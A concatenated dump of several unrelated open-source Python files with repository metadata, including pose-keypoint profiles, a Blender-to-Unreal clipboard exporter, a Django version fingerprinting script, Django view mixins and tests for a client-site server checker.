('left_knee', LeftRightType.LEFT),
('right_knee', LeftRightType.RIGHT),
('left_ankle', LeftRightType.LEFT),
('right_ankle', LeftRightType.RIGHT)],
offset_keypoint_names=['pelvis'],
scale_keypoint_name_pairs=[(['pelvis'], ['spine']),
(['spine'], ['neck'])],
segment_name_pairs=[(['pelvis'], ['spine']), (['pelvis'], ['left_hip']),
(['pelvis'], ['right_hip']), (['spine'], ['neck']),
(['left_hip'], ['left_knee']),
(['right_hip'], ['right_knee']),
(['left_knee'], ['left_ankle']),
(['right_knee'], ['right_ankle']),
(['neck'], ['head']), (['neck'], ['left_shoulder']),
(['neck'], ['right_shoulder']),
(['head'], ['head_top']),
(['left_shoulder'], ['left_elbow']),
(['right_shoulder'], ['right_elbow']),
(['left_elbow'], ['left_wrist']),
(['right_elbow'], ['right_wrist'])],
head_keypoint_name=['head'],
neck_keypoint_name=['neck'],
left_shoulder_keypoint_name=['left_shoulder'],
right_shoulder_keypoint_name=['right_shoulder'],
left_elbow_keypoint_name=['left_elbow'],
right_elbow_keypoint_name=['right_elbow'],
left_wrist_keypoint_name=['left_wrist'],
right_wrist_keypoint_name=['right_wrist'],
spine_keypoint_name=['spine'],
pelvis_keypoint_name=['pelvis'],
left_hip_keypoint_name=['left_hip'],
right_hip_keypoint_name=['right_hip'],
left_knee_keypoint_name=['left_knee'],
right_knee_keypoint_name=['right_knee'],
left_ankle_keypoint_name=['left_ankle'],
right_ankle_keypoint_name=['right_ankle'])
class Std13KeypointProfile2D(KeypointProfile2D):
"""Standard 2D 13-keypoint profile."""
def __init__(self):
"""Initializer."""
super(Std13KeypointProfile2D, self).__init__(
name='2DSTD13',
keypoint_names=[('NOSE_TIP', LeftRightType.CENTRAL),
('LEFT_SHOULDER', LeftRightType.LEFT),
('RIGHT_SHOULDER', LeftRightType.RIGHT),
('LEFT_ELBOW', LeftRightType.LEFT),
('RIGHT_ELBOW', LeftRightType.RIGHT),
('LEFT_WRIST', LeftRightType.LEFT),
('RIGHT_WRIST', LeftRightType.RIGHT),
('LEFT_HIP', LeftRightType.LEFT),
('RIGHT_HIP', LeftRightType.RIGHT),
('LEFT_KNEE', LeftRightType.LEFT),
('RIGHT_KNEE', LeftRightType.RIGHT),
('LEFT_ANKLE', LeftRightType.LEFT),
('RIGHT_ANKLE', LeftRightType.RIGHT)],
offset_keypoint_names=['LEFT_HIP', 'RIGHT_HIP'],
scale_keypoint_name_pairs=[(['LEFT_SHOULDER'], ['RIGHT_SHOULDER']),
(['LEFT_SHOULDER'], ['LEFT_HIP']),
(['LEFT_SHOULDER'], ['RIGHT_HIP']),
(['RIGHT_SHOULDER'], ['LEFT_HIP']),
(['RIGHT_SHOULDER'], ['RIGHT_HIP']),
(['LEFT_HIP'], ['RIGHT_HIP'])],
segment_name_pairs=[(['NOSE_TIP'], ['LEFT_SHOULDER']),
(['NOSE_TIP'], ['RIGHT_SHOULDER']),
(['LEFT_SHOULDER'], ['RIGHT_SHOULDER']),
(['LEFT_SHOULDER'], ['LEFT_ELBOW']),
(['RIGHT_SHOULDER'], ['RIGHT_ELBOW']),
(['LEFT_ELBOW'], ['LEFT_WRIST']),
(['RIGHT_ELBOW'], ['RIGHT_WRIST']),
(['LEFT_SHOULDER'], ['LEFT_HIP']),
(['RIGHT_SHOULDER'], ['RIGHT_HIP']),
(['LEFT_HIP'], ['RIGHT_HIP']),
(['LEFT_HIP'], ['LEFT_KNEE']),
(['RIGHT_HIP'], ['RIGHT_KNEE']),
(['LEFT_KNEE'], ['LEFT_ANKLE']),
(['RIGHT_KNEE'], ['RIGHT_ANKLE'])],
compatible_keypoint_name_dict={
'3DSTD16': [
'HEAD', 'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_ELBOW',
'RIGHT_ELBOW', 'LEFT_WRIST', 'RIGHT_WRIST', 'LEFT_HIP',
'RIGHT_HIP', 'LEFT_KNEE', 'RIGHT_KNEE', 'LEFT_ANKLE',
'RIGHT_ANKLE'
],
'3DSTD13': [
'HEAD', 'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_ELBOW',
'RIGHT_ELBOW', 'LEFT_WRIST', 'RIGHT_WRIST', 'LEFT_HIP',
'RIGHT_HIP', 'LEFT_KNEE', 'RIGHT_KNEE', 'LEFT_ANKLE',
'RIGHT_ANKLE'
],
'LEGACY_3DH36M17': [
'Head', 'LShoulder', 'RShoulder', 'LElbow', 'RElbow', 'LWrist',
'RWrist', 'LHip', 'RHip', 'LKnee', 'RKnee', 'LFoot', 'RFoot'
],
'LEGACY_3DMPII3DHP17': [
'head', 'left_shoulder', 'right_shoulder', 'left_elbow',
'right_elbow', 'left_wrist', 'right_wrist', 'left_hip',
'right_hip', 'left_knee', 'right_knee', 'left_ankle',
'right_ankle'
],
},
head_keypoint_name=['NOSE_TIP'],
neck_keypoint_name=['LEFT_SHOULDER', 'RIGHT_SHOULDER'],
left_shoulder_keypoint_name=['LEFT_SHOULDER'],
right_shoulder_keypoint_name=['RIGHT_SHOULDER'],
left_elbow_keypoint_name=['LEFT_ELBOW'],
right_elbow_keypoint_name=['RIGHT_ELBOW'],
left_wrist_keypoint_name=['LEFT_WRIST'],
right_wrist_keypoint_name=['RIGHT_WRIST'],
spine_keypoint_name=[
'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_HIP', 'RIGHT_HIP'
],
pelvis_keypoint_name=['LEFT_HIP', 'RIGHT_HIP'],
left_hip_keypoint_name=['LEFT_HIP'],
right_hip_keypoint_name=['RIGHT_HIP'],
left_knee_keypoint_name=['LEFT_KNEE'],
right_knee_keypoint_name=['RIGHT_KNEE'],
left_ankle_keypoint_name=['LEFT_ANKLE'],
right_ankle_keypoint_name=['RIGHT_ANKLE'])
class LegacyCoco13KeypointProfile2D(Std13KeypointProfile2D):
"""Legacy COCO 2D 13-keypoint profile.
This profile is the same as the `2DSTD13` profil, except the name.
"""
def __init__(self):
"""Initializer."""
super(LegacyCoco13KeypointProfile2D, self).__init__()
self._name = 'LEGACY_2DCOCO13'
class LegacyH36m13KeypointProfile2D(KeypointProfile2D):
"""Legacy Human3.6M 2D 13-keypoint profile."""
def __init__(self):
"""Initializer."""
super(LegacyH36m13KeypointProfile2D,
self).__init__(
name='LEGACY_2DH36M13',
keypoint_names=[('Head', LeftRightType.CENTRAL),
('LShoulder', LeftRightType.LEFT),
('RShoulder', LeftRightType.RIGHT),
('LElbow', LeftRightType.LEFT),
('RElbow', LeftRightType.RIGHT),
('LWrist', LeftRightType.LEFT),
('RWrist', LeftRightType.RIGHT),
('LHip', LeftRightType.LEFT),
('RHip', LeftRightType.RIGHT),
('LKnee', LeftRightType.LEFT),
('RKnee', LeftRightType.RIGHT),
('LFoot', LeftRightType.LEFT),
('RFoot', LeftRightType.RIGHT)],
offset_keypoint_names=['LHip', 'RHip'],
scale_keypoint_name_pairs=[(['LShoulder'], ['RShoulder']),
(['LShoulder'], ['LHip']),
(['LShoulder'], ['RHip']),
(['RShoulder'], ['LHip']),
(['RShoulder'], ['RHip']),
(['LHip'], ['RHip'])],
segment_name_pairs=[(['Head'], ['LShoulder']),
(['Head'], ['RShoulder']),
(['LShoulder'], ['LElbow']),
(['LElbow'], ['LWrist']),
(['RShoulder'], ['RElbow']),
(['RElbow'], ['RWrist']),
(['LShoulder'], ['LHip']),
(['RShoulder'], ['RHip']),
(['LHip'], ['LKnee']), (['LKnee'], ['LFoot']),
(['RHip'], ['RKnee']), (['RKnee'], ['RFoot']),
(['LShoulder'], ['RShoulder']),
(['LHip'], ['RHip'])],
compatible_keypoint_name_dict={
'3DSTD16': [
'HEAD', 'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_ELBOW',
'RIGHT_ELBOW', 'LEFT_WRIST', 'RIGHT_WRIST', 'LEFT_HIP',
'RIGHT_HIP', 'LEFT_KNEE', 'RIGHT_KNEE', 'LEFT_ANKLE',
'RIGHT_ANKLE'
],
'3DSTD13': [
'HEAD', 'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_ELBOW',
'RIGHT_ELBOW', 'LEFT_WRIST', 'RIGHT_WRIST', 'LEFT_HIP',
'RIGHT_HIP', 'LEFT_KNEE', 'RIGHT_KNEE', 'LEFT_ANKLE',
'RIGHT_ANKLE'
],
'LEGACY_3DH36M17': [
'Head', 'LShoulder', 'RShoulder', 'LElbow', 'RElbow',
'LWrist', 'RWrist', 'LHip', 'RHip', 'LKnee', 'RKnee',
'LFoot', 'RFoot'
],
'LEGACY_3DMPII3DHP17': [
'head', 'left_shoulder', 'right_shoulder', 'left_elbow',
'right_elbow', 'left_wrist', 'right_wrist', 'left_hip',
'right_hip', 'left_knee', 'right_knee', 'left_ankle',
'right_ankle'
],
},
head_keypoint_name=['Head'],
neck_keypoint_name=['LShoulder', 'RShoulder'],
left_shoulder_keypoint_name=['LShoulder'],
right_shoulder_keypoint_name=['RShoulder'],
left_elbow_keypoint_name=['LElbow'],
right_elbow_keypoint_name=['RElbow'],
left_wrist_keypoint_name=['LWrist'],
right_wrist_keypoint_name=['RWrist'],
spine_keypoint_name=['LShoulder', 'RShoulder', 'LHip', 'RHip'],
pelvis_keypoint_name=['LHip', 'RHip'],
left_hip_keypoint_name=['LHip'],
right_hip_keypoint_name=['RHip'],
left_knee_keypoint_name=['LKnee'],
right_knee_keypoint_name=['RKnee'],
left_ankle_keypoint_name=['LFoot'],
right_ankle_keypoint_name=['RFoot'])
def create_keypoint_profile_or_die(keypoint_profile_name):
"""Creates keypoint profile based on name.
Args:
keypoint_profile_name: A string for keypoint profile name.
Returns:
A keypint profile class object.
Raises:
ValueError: If keypoint profile name is unsupported.
"""
if keypoint_profile_name == '3DSTD16':
return Std16KeypointProfile3D()
if keypoint_profile_name == '3DSTD13':
return Std13KeypointProfile3D()
if keypoint_profile_name == 'LEGACY_3DH36M17':
return LegacyH36m17KeypointProfile3D()
if keypoint_profile_name == 'LEGACY_3DH36M13':
return LegacyH36m13KeypointProfile3D()
if keypoint_profile_name == 'LEGACY_3DMPII3DHP17':
return LegacyMpii3dhp17KeypointProfile3D()
if keypoint_profile_name == '2DSTD13':
return Std13KeypointProfile2D()
if keypoint_profile_name == 'LEGACY_2DCOCO13':
return LegacyCoco13KeypointProfile2D()
if keypoint_profile_name == 'LEGACY_2DH36M13':
return LegacyH36m13KeypointProfile2D()
raise ValueError('Unsupported keypoint profile name: `%s`.' %
str(keypoint_profile_name))
| apache-2.0 | 7,232,078,692,394,039,000 | 41.027586 | 80 | 0.556059 | false | 3.58708 | false | false | false |
stilobique/UE4-Tools | controllers/data_buffer.py | 1 | 3448 | import bpy
import pyperclip
from math import degrees
class DataBuffer(bpy.types.Operator):
"""Export data Position, Rotation and Scale of all selected element"""
bl_idname = "object.data_buffer"
bl_label = "Paste information buffer"
def execute(self, context):
objs = context.selected_objects
string_data_prefixe = 'Begin Map \n'' Begin Level \n'
string_data_suffixe = ' End Level\n''Begin Surface\n''End ' \
'Surface\n''End Map'
string_data = ""
for element in objs:
if element is not None:
position_x = str(round(element.location.x * 100, 2))
position_y = str(round(element.location.y * -100, 2))
position_z = str(round(element.location.z * 100, 2))
rotation_pitch = str(round(degrees(element.rotation_euler.y), 2))
rotation_yaw = str(round(degrees(element.rotation_euler.z),
2)* -1)
rotation_roll = str(round(degrees(element.rotation_euler.x), 2))
string_data = string_data + \
' Begin Actor '\
'Class=StaticMeshActor '\
'Name=' + element.name + ' ' \
'Archetype=StaticMeshActor'\
'\'/Script/Engine.Default__StaticMeshActor\'\n'\
' Begin Object Class=StaticMeshComponent '\
'Name=StaticMeshComponent0 '\
'ObjName=StaticMeshComponent0 ' \
'Archetype=StaticMeshComponent'\
'\'/Script/Engine.Default__StaticMeshActor:StaticMeshComponent0' \
'\'\n'\
' End Object\n'\
' Begin Object '\
'Name=StaticMeshComponent0\n'\
' StaticMesh=StaticMesh\'/Engine/EditorMeshes/EditorCube' \
'.EditorCube\' \n'\
' RelativeLocation=(X=' + position_x + ',Y=' + \
position_y + ',Z=' + position_z + ')\n'\
' RelativeScale3D=(X=' + str(round(element.scale.x, 2)) + ',' \
'Y=' + str(round(element.scale.y, 2)) + ',' \
'Z=' + \
str(round(element.scale.z, 2)) + ')\n'\
' RelativeRotation=(Pitch=' + rotation_pitch + ',Yaw=' + \
rotation_yaw + ',' \
'Roll=' + \
rotation_roll + ')\n'\
' CustomProperties\n' \
' End Object\n' \
' StaticMeshComponent=StaticMeshComponent0\n' \
' Components(0)=StaticMeshComponent0\n' \
' RootComponent=StaticMeshComponent0\n' \
' ActorLabel="' + element.name + '"\n' \
' End Actor\n' \
else:
self.report({'WARNING'}, "Select an object(s).")
return {'CANCELLED'}
string_complete = string_data_prefixe + string_data \
+ string_data_suffixe
# copyBuffer(objs[0].name)
pyperclip.copy(string_complete)
print(string_complete)
self.report({'INFO'}, "Data copied on your Buffer.")
return {'FINISHED'}
def register():
bpy.utils.register_class(DataBuffer)
def unregister():
bpy.utils.unregister_class(DataBuffer)
if __name__ == "__main__":
register() | gpl-3.0 | -6,769,097,919,469,354,000 | 37.322222 | 114 | 0.49739 | false | 4.099881 | false | false | false |
AceSrc/datagon | datagon/generator/translator.py | 1 | 3802 | import parser
import random
result = ''
symbol = {}
cnt = 0
def Translator(ast):
def PrintError(x):
print(x)
exit(1)
def PrintMsg(x):
print(x)
def Output(x):
global result
result += str(x) + ' '
def GetRandomInt(interval):
if isinstance(interval, str):
PrintError('Error: ' + interval)
if isinstance(interval, int):
return interval
if interval[0] > interval[1]:
print('!!! Invaild Interval ')
exit(1)
rt = random.randint(interval[0], interval[1])
return rt
def AddPermutation(interval):
n = GetRandomInt(interval)
p = [i for i in range(1, n + 1)]
random.shuffle(p)
global result
for i in p:
result += str(i) + ' '
return None
def Add(a, b):
return GetRandomInt(a) + GetRandomInt(b)
def Mul(a, b):
return GetRandomInt(a) + GetRandomInt(b)
def Sub(a, b):
return GetRandomInt(a) + GetRandomInt(b)
def AddWeight(n, interval):
n = GetRandomInt(n)
for i in range(0, n):
Output(GetRandomInt(interval))
def RepeatOutput(node):
times = TranslateNode(node.params[0], node)
for i in range(0, times):
TranslateArray(node)
AddNewLine()
def HandleFunction(node):
print('handling function: ' + node.type)
print(node.params)
cases = {
'print': lambda x: Output(GetRandomInt(TranslateNode(node.params[0], x))),
'add': lambda x: Add(TranslateNode(x.params[0], x), TranslateNode(x.params[1], x)),
'sub': lambda x: Sub(TranslateNode(x.params[0], x), TranslateNode(x.params[1], x)),
'mul': lambda x: Mul(TranslateNode(x.params[0], x), TranslateNode(x.params[1], x)),
'permutation': lambda x: AddPermutation(TranslateNode(x.params[0], x)),
'weight': lambda x: AddWeight(TranslateNode(x.params[0], x), TranslateNode(x.params[1], x)),
'repeat': lambda x: RepeatOutput(x),
'set': lambda x: SetVariableValue(x.params[0].name, TranslateNode(x.params[1], x))
}
return cases.get(node.type, lambda x: None)(node)
def AddNewLine():
global cnt
cnt += 1
if cnt <= 0:
return
cnt -= 1
global result
result += '\n'
def CleanLine():
print("Clean")
global cnt
cnt -= 1
def HandleFormat(node):
print("Handling Format: " + node.value)
cases = {
'newline': lambda x: AddNewLine(),
'clearline': lambda x: CleanLine(),
}
return cases.get(node.value, lambda x: None)(node)
def GetVariableValue(name):
return symbol.get(name, name)
def SetVariableValue(name, value):
value = GetRandomInt(value)
symbol[name] = value
print('Set variable: ' + str(name) + ' = ' + str(symbol[name]))
return symbol[name]
def TranslateArray(node):
for x in node.params:
TranslateNode(x, node)
def TranslateNode(node, parent):
cases = {
parser.Function: lambda x: HandleFunction(x),
parser.Number: lambda x: x.value,
parser.Interval:
lambda x: [TranslateNode(x.left, x) + x.leftoffset, TranslateNode(x.right, x) + x.rightoffset],
parser.String: lambda x: GetVariableValue(x.name),
parser.Setvar: lambda x: SetVariableValue(x),
parser.Program: lambda x: TranslateArray(x),
parser.Format: lambda x: HandleFormat(x),
}
return cases.get(node.__class__, lambda x: None)(node)
TranslateArray(ast)
return result
| mit | 9,119,672,105,469,806,000 | 29.66129 | 111 | 0.553919 | false | 3.779324 | false | false | false |
sesh/djver | djver/djver.py | 1 | 6137 | #!/usr/bin/env python
"""
djver.
Usage:
djver.py [<url>] [--static-path=<static-path>] [--find-diffs] [--verbose]
Options:
--static-path=<static-path> URL path to the site's static files [default: /static/].
--find-diffs Attempt to find differences between the known versions of Django
--verbose Turn on verbose logging
"""
import os
import sys
import subprocess
import shutil
import difflib
import requests
from docopt import docopt
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
try:
from packaging.version import parse
except:
def parse(version):
return None
RESPONSE_CACHE = {}
THIRD_PARTY_CSS = [
# Third party apps, might disguise version numbers
('django-flat-theme, or Django 1.9', 'fonts.css', 'Roboto'),
('django-suit', 'forms.css', 'Django Suit'),
]
ADMIN_CHANGES = [
('2.1.2-2.1', 'css/base.css', 'background: url(../img/icon-viewlink.svg) 0 1px no-repeat;'),
('2.0.9-2.0', 'css/base.css', 'textarea:focus, select:focus, .vTextField:focus {'),
('1.11.16-1.11', 'css/base.css', 'background-position: right 7px center;'),
('1.10.8-1.10', 'css/base.css', 'color: #000;'),
('1.9.13-1.9', 'css/widgets.css', 'margin-left: 7px;'),
('1.8.19-1.8.2', 'css/forms.css', 'clear: left;'),
('1.8.1', 'css/widgets.css', '.related-widget-wrapper {'),
('1.8', 'css/widgets.css', 'opacity: 1;'),
('1.7.11-1.7', 'css/base.css', '#branding a:hover {'),
('1.6.11-1.6', 'css/widgets.css', 'width: 360px;'),
('1.5.12-1.5', 'css/widgets.css', '.url a {'),
('1.4.22-1.4.1', 'css/widgets.css', '.inline-group .aligned .selector .selector-filter label {'),
]
def check_str(url, search_str, verbose=False):
if url in RESPONSE_CACHE.keys():
content = RESPONSE_CACHE[url]
status_code = 200
else:
response = requests.get(url)
content = response.content.decode().replace(' ', '')
status_code = response.status_code
if verbose:
print('[{}] {}'.format(status_code, url))
if status_code == 200:
RESPONSE_CACHE[url] = content
return search_str.replace(' ', '') in content
def check_version(base_url, static_path, verbose=False):
if not base_url.startswith('http'):
base_url = 'http://{}'.format(base_url)
for version, path, string in ADMIN_CHANGES:
url = '{}{}admin/{}'.format(base_url, static_path, path)
if check_str(url, string, verbose):
return version
def find_diffs():
response = requests.get('https://pypi.org/pypi/Django/json')
versions = [parse(v) for v in response.json()['releases'].keys()]
versions = sorted(versions, reverse=True)
print(versions)
versions = [str(v) for v in versions if v.is_prerelease == False and v > parse("1.3.99")]
# we only care about 1.4 and above
# favour files _not_ found in django-flat-theme
files = [
# admin js
# "js/SelectBox.js",
# "js/actions.js",
# "js/actions.min.js",
# "js/calendar.js",
# "js/collapse.js",
# "js/collapse.min.js",
# "js/core.js",
# "js/inlines.js",
# "js/inlines.min.js",
# "js/jquery.init.js",
# "js/prepopulate.js",
# "js/prepopulate.min.js",
# "js/timeparse.js",
# "js/urlify.js",
# admin css
'css/widgets.css', 'css/base.css', 'css/forms.css', 'css/login.css', 'css/dashboard.css',
# 'css/ie.css', # removed in 1.9.x
]
for v in versions:
os.makedirs('files/{}/css/'.format(v), exist_ok=True)
os.makedirs('files/{}/js/'.format(v), exist_ok=True)
for fn in files:
full_path = 'files/{}/{}'.format(v, fn)
if not os.path.exists(full_path):
repo = 'https://raw.githubusercontent.com/django/django/'
url = '{}{}/django/contrib/admin/static/admin/{}'.format(repo, v, fn)
if v.startswith('1.3'):
url = '{}{}/django/contrib/admin/media/{}'.format(repo, v, fn)
response = requests.get(url)
print('[{}] {}'.format(response.status_code, url))
with open(full_path, 'wb') as f:
f.write(response.content)
matched_versions = []
for i, v1 in enumerate(versions[:-1]):
matched_versions.append(v1)
v2 = versions[i + 1]
new_line = None
for f in files:
f1 = open('files/{}/{}'.format(v1, f)).read()
f2 = open('files/{}/{}'.format(v2, f)).read()
# compare f2 to f1 so that we see _added_ lines
diff = difflib.ndiff(f2.splitlines(), f1.splitlines())
for line in diff:
if line.startswith('+ ') and '/*' not in line:
line = line[2:]
# ensure this line is unique within the file
if f1.count(line) == 1:
# we also want to make sure that it doesn't appear in any _older_ versions
for v in versions[i + 1:]:
f3 = open('files/{}/{}'.format(v, f)).read()
if line in f3:
break
new_line = line
if new_line:
if len(matched_versions) > 1:
print("('{}', '{}', '{}'),".format('-'.join([matched_versions[0], matched_versions[-1]]), f, new_line.strip()))
else:
print("('{}', '{}', '{}'),".format(matched_versions[0], f, new_line.strip()))
matched_versions = []
break
def djver():
arguments = docopt(__doc__, version='djver 2.0.0')
if arguments['--find-diffs']:
find_diffs()
elif arguments['<url>']:
version = check_version(arguments['<url>'], arguments['--static-path'], arguments['--verbose'])
if version:
print(version)
else:
print('Unable to detect version.')
if __name__ == '__main__':
djver()
| mit | 6,160,630,217,541,258,000 | 31.994624 | 131 | 0.536093 | false | 3.455518 | false | false | false |
pythonbyexample/PBE | dbe/classviews/edit_custom.py | 1 | 5732 | from django.forms import formsets
from django.contrib import messages
from django.db.models import Q
from detail import *
from edit import *
from dbe.shared.utils import *
class SearchFormViewMixin(BaseFormView):
ignore_get_keys = ["page"]
def get_form_kwargs(self):
""" Returns the keyword arguments for instanciating the form. """
r = self.request
kwargs = dict(initial=self.get_initial())
if r.method in ("POST", "PUT"):
kwargs.update(dict(data=r.POST, files=r.FILES))
elif r.GET:
# do get form processing if there's get data that's not in ignore list
if [k for k in r.GET.keys() if k not in self.ignore_get_keys]:
kwargs.update(dict(data=r.GET))
return kwargs
def get(self, request):
form = self.get_form()
if self.request.GET:
if form.is_valid():
self.process_form(form)
else:
return self.form_invalid(form)
return self.render_to_response(self.get_context_data(form=form))
class SearchFormView(FormView, SearchFormViewMixin):
"""FormView for search pages."""
class UpdateView2(UpdateView):
def get_success_url(self):
return self.object.get_absolute_url()
def get_context_data(self, **kwargs):
c = super(UpdateView2, self).get_context_data(**kwargs)
c.update(self.add_context())
return c
def add_context(self):
return {}
class UserUpdateView(UpdateView2):
def get_form_kwargs(self):
d = super(UpdateView2, self).get_form_kwargs()
d.update(dict(user=self.request.user))
return d
class CreateView2(CreateView):
def get_context_data(self, **kwargs):
c = super(CreateView2, self).get_context_data(**kwargs)
if hasattr(self, "add_context"):
c.update(self.add_context())
return c
def get_form_kwargs(self):
d = super(CreateView2, self).get_form_kwargs()
d.update(dict(user=self.request.user))
return d
class OwnObjMixin(SingleObjectMixin):
"""Access object, checking that it belongs to current user."""
item_name = None # used in permissions error message
owner_field = "creator" # object's field to compare to current user to check permission
def perm_error(self):
return HttpResponse("You don't have permissions to access this %s." % self.item_name)
def validate(self, obj):
if getattr(obj, self.owner_field) == self.request.user:
return True
def get_object(self, queryset=None):
obj = super(OwnObjMixin, self).get_object(queryset)
if not self.validate(obj): return None
return obj
class DeleteOwnObjView(OwnObjMixin, DeleteView):
"""Delete object, checking that it belongs to current user."""
class UpdateOwnObjView(OwnObjMixin, UpdateView2):
"""Update object, checking that it belongs to current user."""
class SearchEditFormset(SearchFormView):
"""Search form filtering a formset of items to be updated."""
model = None
formset_class = None
form_class = None
def get_form_class(self):
if self.request.method == "GET": return self.form_class
else: return self.formset_class
def get_queryset(self, form=None):
return self.model.objects.filter(self.get_query(form))
def get_query(self, form):
"""This method should always be overridden, applying search from the `form`."""
return Q()
def form_valid(self, form):
formset = None
if self.request.method == "GET":
formset = self.formset_class(queryset=self.get_queryset(form))
else:
form.save()
messages.success(self.request, "%s(s) were updated successfully" % self.model.__name__.capitalize())
formset = form
form = self.form_class(self.request.GET)
return self.render_to_response(self.get_context_data(form=form, formset=formset))
def form_invalid(self, form):
formset = form
form = self.form_class(self.request.GET)
return self.render_to_response(self.get_context_data(form=form, formset=formset))
def get(self, request, *args, **kwargs):
form = self.get_form()
if form.is_bound:
if form.is_valid(): return self.form_valid(form)
else: return self.form_invalid(form)
return self.render_to_response(self.get_context_data(form=form))
class CreateWithFormset(FormView):
""" Create multiple objects using a formset.
Passes user as an arg to each form init function.
"""
model = None
form_class = None
extra = 5
def get_form(self, form_class=None):
Formset = formsets.formset_factory(self.form_class, extra=self.extra)
Formset.form = staticmethod(curry(self.form_class, user=self.request.user))
return Formset(**self.get_form_kwargs())
def post(self, request, *args, **kwargs):
self.object = None
formset = self.get_form()
if formset.is_valid():
return self.form_valid(formset)
else:
return self.form_invalid(formset)
def form_valid(self, formset):
for form in formset:
if form.has_changed():
form.save()
return HttpResponseRedirect(reverse(self.success_url_name))
def form_invalid(self, form):
return self.render_to_response(self.get_context_data(form=form))
def get_context_data(self, **kwargs):
context = super(CreateWithFormset, self).get_context_data(**kwargs)
return updated( context, dict(formset=self.get_form()) )
| bsd-3-clause | -6,290,611,191,496,170,000 | 32.325581 | 112 | 0.629449 | false | 3.834114 | false | false | false |
CINPLA/expipe-dev | expipe-templates-cinpla/get_templates.py | 1 | 1153 | import expipe
import os.path as op
import os
import json
overwrite = True
base_dir = op.join(op.abspath(op.dirname(op.expanduser(__file__))), 'templates')
templates = expipe.core.FirebaseBackend("/templates").get()
for template, val in templates.items():
identifier = val.get('identifier')
if identifier is None:
continue
path = template.split('_')[0]
name = identifier.split('_')[1:]
if path == 'person':
continue
if len(name) == 0:
continue
raise ValueError('No grouping on template "' + template + '"')
fbase = '_'.join(name)
fname = op.join(base_dir, path, fbase + '.json')
result = expipe.get_template(template=template)
if op.exists(fname) and not overwrite:
raise FileExistsError('The filename "' + fname +
'" exists, set ovewrite to true.')
os.makedirs(op.dirname(fname), exist_ok=True)
print('Saving template "' + template + '" to "' + fname + '"')
with open(fname, 'w') as outfile:
result = expipe.core.convert_to_firebase(result)
json.dump(result, outfile,
sort_keys=True, indent=4)
| gpl-3.0 | -6,103,008,432,294,853,000 | 33.939394 | 80 | 0.611448 | false | 3.743506 | false | false | false |
prontodev/stillwithus | stillwithus/clientsites/tests.py | 1 | 6014 | from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase
from .models import ClientSite
from servers.models import Server
class ClientSiteTest(TestCase):
def test_create_new_clientsite(self):
clientsite = ClientSite()
clientsite.domain = 'www.atlasperformancechicago.com'
self.assertFalse(clientsite.id)
clientsite.save()
self.assertTrue(clientsite.id)
clientsite = ClientSite.objects.get(id=clientsite.id)
self.assertEqual(clientsite.domain, 'www.atlasperformancechicago.com')
class ClientSiteViewTest(TestCase):
def setUp(self):
self.url = reverse('clientsites')
def test_clientsite_should_be_accessible(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
def test_clientsite_should_use_correct_template(self):
response = self.client.get(self.url)
self.assertTemplateUsed(response, 'clientsites.html')
def test_clientsite_should_have_title(self):
response = self.client.get(self.url)
expected = '<title>Still with Us?</title>'
self.assertContains(response, expected, status_code=200)
def test_clientsite_should_render_html_for_clientsites_correctly(self):
response = self.client.get(self.url)
expected = '<h1>Client Sites</h1>'
self.assertContains(response, expected, status_code=200)
expected = '<thead><tr><th>Domain</th><th>Still with Us?'
expected += '</th><th>Note</th></tr></thead>'
self.assertContains(response, expected, status_code=200)
def test_clientsite_should_query_domains_and_check_if_still_with_us(self):
Server.objects.bulk_create([
Server(name='Pronto 1', ip='54.72.3.133'),
Server(name='Pronto 2', ip='54.72.3.103'),
Server(name='Pronto 3', ip='54.252.146.70'),
Server(name='Pronto 4', ip='54.67.50.151'),
Server(name='Pronto 5', ip='52.1.32.33'),
Server(name='Pronto 6', ip='27.254.65.18'),
Server(name='Pronto 7', ip='54.246.93.4'),
Server(name='Pronto 8', ip='54.228.219.35'),
Server(name='Pronto 9', ip='54.72.3.253'),
Server(name='Pronto 10', ip='54.171.171.172'),
Server(name='Pronto 11', ip='46.137.96.191'),
Server(name='Pronto 12', ip='54.194.28.91'),
Server(name='Pronto 13', ip='54.72.53.55'),
])
ClientSite.objects.bulk_create([
ClientSite(domain='www.prontomarketing.com'),
ClientSite(domain='www.atlasperformancechicago.com'),
])
response = self.client.get(self.url)
expected = '<tr><td><a href="http://www.prontomarketing.com" '
expected += 'target="_blank">www.prontomarketing.com</a></td>'
expected += '<td style="color: red;">No</td><td>---</td></tr>'
self.assertContains(response, expected, count=1, status_code=200)
expected = '<td><a href="http://www.prontomarketing.com" '
expected += 'target="_blank">www.prontomarketing.com</a></td>'
self.assertContains(response, expected, count=1, status_code=200)
expected = '<tr><td><a href="http://www.atlasperformancechicago.com" '
expected += 'target="_blank">www.atlasperformancechicago.com</a></td>'
expected += '<td>Yes</td><td>---</td></tr>'
self.assertContains(response, expected, count=1, status_code=200)
expected = '<td><a href="http://www.atlasperformancechicago.com" '
expected += 'target="_blank">www.atlasperformancechicago.com</a></td>'
self.assertContains(response, expected, count=1, status_code=200)
def test_clientsite_should_add_note_if_cannot_get_ip(self):
ClientSite.objects.create(
domain='dayton.kaiafit.com'
)
response = self.client.get(self.url)
expected = '<tr><td><a href="http://dayton.kaiafit.com" '
expected += 'target="_blank">dayton.kaiafit.com</a></td>'
expected += '<td>---</td><td>Cannot get IP</td></tr>'
self.assertContains(response, expected, count=1, status_code=200)
def test_clientsite_should_render_html_for_servers_correctly(self):
response = self.client.get(self.url)
expected = '<h1>Servers</h1>'
self.assertContains(response, expected, status_code=200)
expected = '<thead><tr><th>Name</th><th>IP</th></tr></thead>'
self.assertContains(response, expected, status_code=200)
def test_clientsite_should_query_server_name_and_ip_correctly(self):
Server.objects.create(
name='AWS ELB',
ip='54.72.3.133'
)
Server.objects.create(
name='Bypronto',
ip='54.171.171.172'
)
response = self.client.get(self.url)
expected = '<tr><td>AWS ELB</td><td>54.72.3.133</td></tr>'
self.assertContains(response, expected, status_code=200)
expected = '<tr><td>Bypronto</td><td>54.171.171.172</td></tr>'
self.assertContains(response, expected, status_code=200)
class ClientSiteAdminTest(TestCase):
def setUp(self):
admin = User.objects.create_superuser(
'admin',
'[email protected]',
